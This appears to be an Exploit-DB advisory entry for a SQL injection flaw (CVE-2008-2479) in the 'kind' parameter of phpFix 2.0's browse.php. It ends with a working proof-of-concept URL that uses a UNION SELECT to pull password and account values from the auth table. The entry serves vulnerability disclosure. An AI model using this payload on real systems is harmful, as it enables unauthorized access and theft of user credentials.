phpFix 2.0 - fix/browse.php kind Parameter SQL Injection

2008-05-26T00:00:00
ID EDB-ID:31844
Type exploitdb
Reporter Unohope
Modified 2008-05-26T00:00:00

Description

phpFix 2.0 fix/browse.php kind Parameter SQL Injection. CVE-2008-2479. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/29371/info

phpFix is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

phpFix 2.0 is vulnerable; other versions may also be affected. 

http://www.example.com/phpfix/fix/browse.php?kind=-99+union+select+0,passwd,account,3,4,5,6,7,8,9,10,11+from+auth